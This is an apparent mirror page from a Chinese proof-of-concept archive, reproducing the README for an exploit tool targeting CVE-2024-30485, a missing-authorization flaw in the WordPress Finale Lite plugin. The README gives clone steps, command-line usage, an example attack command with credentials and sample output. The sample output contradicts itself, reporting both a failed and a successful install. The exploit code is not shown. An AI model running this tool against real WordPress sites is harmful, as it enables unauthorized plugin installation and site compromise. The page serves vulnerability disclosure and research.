支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 665248e3ec7fd6a26397c26c13d4370d55db217a

来源
https://github.com/Nxploited/CVE-2024-30485
关联漏洞
标题:WordPress plugin Finale Lite 安全漏洞 (CVE-2024-30485)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Finale Lite 2.18.0 版本及之前版本存在安全漏洞,该漏洞源于缺少授权漏洞。
Description
WordPress Finale Lite plugin <= 2.18.0 - Subscriber+ Arbitrary Plugin Installation/Activation vulnerability
介绍
# CVE-2024-30485 Exploit

## 📌 Overview

**CVE-2024-30485** is a high-severity vulnerability found in the **Finale Lite** plugin for WordPress (versions <= 2.18.0). The vulnerability allows authenticated users (Subscriber+) to install and activate arbitrary plugins without proper authorization.

- **Severity**: HIGH (CVSS 8.8)
- **Affected Versions**: Finale Lite <= 2.18.0
- **CWE**: CWE-862 (Missing Authorization)

## 🚀 Features

- ✅ Check if a WordPress site is vulnerable
- ✅ Authenticate with valid credentials
- ✅ Extract security nonce
- ✅ Install arbitrary plugins
- ✅ Activate installed plugins

## 🛠 Requirements

- Python 3
- `requests` and `beautifulsoup4` modules
- Target WordPress site with a vulnerable plugin
- Valid WordPress Subscriber+ credentials

## 📜 Installation

```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2024-30485.git
cd CVE-2024-30485

# Install dependencies
pip install -r requirements.txt
```

## 🔍 Usage

```bash
usage: CVE-2024-30485.py [-h] -u TARGET -U USERNAME -P PASSWORD [plugin]

Exploit CVE-2024-30485 - Finale Lite | # by Khaled AlEnazi

positional arguments:
  plugin                Plugin slug

options:
  -h, --help            show this help message and exit
  -u TARGET, --url TARGET  WordPress site URL
  -U USERNAME, --username USERNAME  WordPress username
  -P PASSWORD, --password PASSWORD  WordPress password
```

### Example:
```bash
python3 CVE-2024-30485.py -u target -U admin -P admin -- disable-comments
```

## 🖥 Output Example

```bash
[+] Target is vulnerable! Detected version: 2.18.0
[+] Logged in successfully.
[+] Extracted Nonce: 2b46e05bc0
[-] Failed to install plugin.
Server Response: 
<p>Unpacking the package&#8230;</p>
<p>Installing the plugin&#8230;</p>
<p>Plugin installed successfully.</p>
</div>{"success":true,"data":"Plugin installed and activated successfully!"}
```

## ⚠️ Disclaimer

This script is for **educational and security research purposes only**. Unauthorized testing against systems **without permission** is illegal. Use responsibly.

## 🔗 References
- [Official CVE Record](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30485)
- [WordPress Plugin Page](https://wordpress.org/plugins/finale-woocommerce-sales-countdown-timer-discount/)

*By: Khaled Alenazi (Nxploit)*
文件快照

 [4.0K]  /data/pocs/665248e3ec7fd6a26397c26c13d4370d55db217a
├── [4.7K]  CVE-2024-30485.py
└── [2.3K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。